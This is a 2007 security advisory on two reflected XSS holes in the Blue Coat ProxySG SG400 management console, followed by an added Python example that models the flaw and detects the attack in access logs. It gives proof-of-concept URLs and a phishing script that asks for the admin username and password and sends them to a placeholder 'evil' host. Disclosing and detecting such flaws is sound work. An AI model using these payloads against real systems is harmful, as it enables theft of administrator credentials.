Two XSS on Blue Coat ProxySG Management Console
PR07-29: Two XSS on Blue Coat ProxySG Management Console
Vulnerability found: 23 July 2007
Vendor informed: 20 August 2007
Vulnerability fixed: 29 October 2007
Advisory publicly released: 1 November 2007
Severity: Medium
Description:
The Blue Coat SG400 Management Console is vulnerable to two XSS holes.
Vulnerable server-side script / unfiltered parameter:
'/Secure/Local/console/install_upload_action/crl_format' / 'name'
Vulnerable server-side script / unfiltered parameter:
'/Secure/Local/console/install_upload_from_file.htm' / 'file'
Notes:
The admin user needs to be authenticated (HTTP basic authentication) for the
injected JavaScript to run.
Successfully tested on:
Model: Blue Coat SG400
Software: SGOS 4.2.1.6
Software Release ID: 25173
Proof of concept #1:
https://target:8082/Secure/Local/console/install_upload_action/crl_format?name="<script>alert("XSS")</script>%00
Injected payload:
"<script>alert("XSS")</script>%00
Proof of concept #2:
https://target:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!--
Injected payload:
<script>alert("XSS")</script><!--
A neat payload to inject instead of an alert() box would be a phishing attack
which forwards the username and password to a third-party site (the script
itself could also be loaded from a third-party site), e.g.:
<script>
do {
  a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your USERNAME","");
  b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your PASSWORD","");
} while(a==null || b==null || a=="" || b=="");
alert("owned!:"+a+"/"+b);window.location="http://evil/?u="+a+"&p="+b
</script><!--
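To make concrete what "unfiltered parameter" means for the two scripts above, and to show how an administrator could pick the request pattern out of proxy access logs, here is an added Python example (not from the advisory, and not Blue Coat's code). The HTML attribute context, the reflect_* helpers and the access-log line format are assumptions; the log lines are constructed and reuse the two PoC URLs in percent-encoded form.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# The two scripts and parameters named in the advisory (PR07-29).
VULNERABLE_PARAMS = {
    "/Secure/Local/console/install_upload_action/crl_format": "name",
    "/Secure/Local/console/install_upload_from_file.htm": "file",
}

def reflect_unsafe(value: str) -> str:
    """Model of the flaw: the parameter is copied verbatim into an HTML attribute
    (assumed context), so a leading quote closes the attribute and <script> runs."""
    return f'<input type="text" value="{value}">'

def reflect_safe(value: str) -> str:
    """Hardened form: drop NUL bytes and HTML-encode quotes and angle brackets."""
    cleaned = value.replace("\x00", "")
    return f'<input type="text" value="{html.escape(cleaned, quote=True)}">'

# Characters that have no business in a CRL name or an upload file name.
MARKUP = re.compile(r'[<>"\x00]')

def suspicious_requests(log_lines):
    """Return (path, param, decoded value) for requests to the vulnerable scripts
    whose parameter carries markup. Constructed log format: '<client> "GET <url> HTTP/1.1" <status>'."""
    hits = []
    for line in log_lines:
        m = re.search(r'"GET (\S+) HTTP', line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        param = VULNERABLE_PARAMS.get(url.path)
        if param is None:
            continue
        # parse_qs percent-decodes, so %3C becomes '<' and %00 becomes a NUL byte
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if MARKUP.search(value):
                hits.append((url.path, param, value))
    return hits

# Constructed access-log lines: one benign CRL upload and the two advisory PoCs.
SAMPLE_LOG = [
    '10.0.0.5 "GET /Secure/Local/console/install_upload_action/crl_format?name=ca.crl HTTP/1.1" 200',
    '10.0.0.9 "GET /Secure/Local/console/install_upload_action/crl_format?name=%22%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%00 HTTP/1.1" 200',
    '10.0.0.9 "GET /Secure/Local/console/install_upload_from_file.htm?file=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C!-- HTTP/1.1" 200',
]
```

Calling suspicious_requests(SAMPLE_LOG) flags only the two PoC requests, and reflect_safe() on either decoded payload yields a value with no live tag or NUL byte.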
Consequences:
An attacker may be able to cause execution of malicious scripting code in the
browser of a Blue Coat SG400 admin who clicks on a link to a Blue Coat ProxySG
Management Console. Such code would run within the context of the target domain.
This type of attack can result in non-persistent defacement of the target site,
or the redirection of confidential information (e.g. basic auth credentials
stolen through a phishing attack as described in the proof of concept) to
unauthorised third parties.
Fixed in:
4.2.6.1, 5.2.2.5
References:
http://www.procheckup.com/Vulnerability_2007.php
http://www.bluecoat.com/support/securityadvisories/advisory_cross-site_scripting_vulnerability
Credits: Adrian Pastor from ProCheckUp Ltd (www.procheckup.com)